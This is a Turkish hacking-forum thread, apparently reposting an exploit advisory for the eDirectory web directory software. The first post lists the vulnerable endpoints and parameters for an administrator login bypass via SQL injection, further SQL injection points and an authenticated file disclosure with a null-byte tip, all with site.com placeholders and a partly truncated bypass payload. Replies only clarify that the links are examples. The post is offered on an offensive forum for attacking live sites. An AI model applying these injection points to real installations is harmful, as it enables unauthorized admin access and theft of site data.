Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...




eDirectory - SQL Injection

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 20-02-2019 21:25   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


eDirectory - SQL Injection



# Exploit Title/Exploit Başlığı: Admin auth bypass, SQLi and File Disclosure
# Dork: N/A
# Date/Tarih: Mart2019
# Exploit Author/Exploit Yazarı: Efren Diaz
# Vendor Homepage/Yapımcı Sitesi: https://www.edirectory.com/
# Software Link/Yazılımın Linki: N/A
# Version/Versiyon: Bütün versiyonlar
# Tested on/Test Edilen Sistem: Ubuntu 14.04
# CVE : N/A

#Description/Açıklama:
eDirectory, kendi şirket web sitenizi, işletme rehberlerinizi, kupon sitelerinizi, yerel rehberinizi, öncü gen sitelerini ve daha fazlasını oluşturmak için bir web tabanlı bir yazılımdır.

# Administrator Login Bypass
Login SQL injection, yönetini kimlik doğrulamasını önlemek ve direkt olarak admin panele bağlanmamız için kullanılan bir yöntemdir.

# SQL Injection
Links/Linkler:
- https://site.com/lo cation.php?type=...vel=[SQLi]
- https://site.com/sitemgr/login.php?key=[SQLi]

# Administrator Login Bypass
Link: https://site.com/sitemgr/login.php?k...emgr' -- -


# File Disclosure (authenticated)
Not:Sadece .php uzantılı dosyalar,fakat eski .php uzantılı dosyalar için null-byte ı deneyin.
Links:
- https://site.com/sitemgr/langcenter/..._id=[PATH]
- https://site.com/sitemgr/configurati..._id=[PATH]



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Teşekkür

BatHero Teşekkür etti.
Alt 20-02-2019 22:07   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
03/2018
Nereden
Space
Mesajlar
Konular

Teşekkür (Etti): 42
Teşekkür (Aldı): 10




Linkler açılmıyor VPN kullansamda bağlanamadım



___________________________________________

Hedef gelecek.


Konu BatHero tarafından (20-02-2019 22:12 Saat 22:12 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 20-02-2019 22:33   #3
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Mesajlar
Konular

Teşekkür (Etti): 1
Teşekkür (Aldı): 46




Vpnsizde girilebiliyor sizde problem olmasın . Bu arada alttaki linkleri kast ediyorsanız onlar yapcanız işlem için örnek giriş biçimi site adı .com .net site her neyse sanırım ondan bahsediyorsunuz



___________________________________________

Sakın Tıklama Bak Uyarıyorum.


Konu Roothaning tarafından (20-02-2019 22:38 Saat 22:38 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 20-02-2019 22:42   #4
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110




Alıntı:
BatHero´isimli üyeden Alıntı Mesajı göster
Linkler açılmıyor VPN kullansamda bağlanamadım
Hocam aşağıdaki site.com olanlar örnek siteler için



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau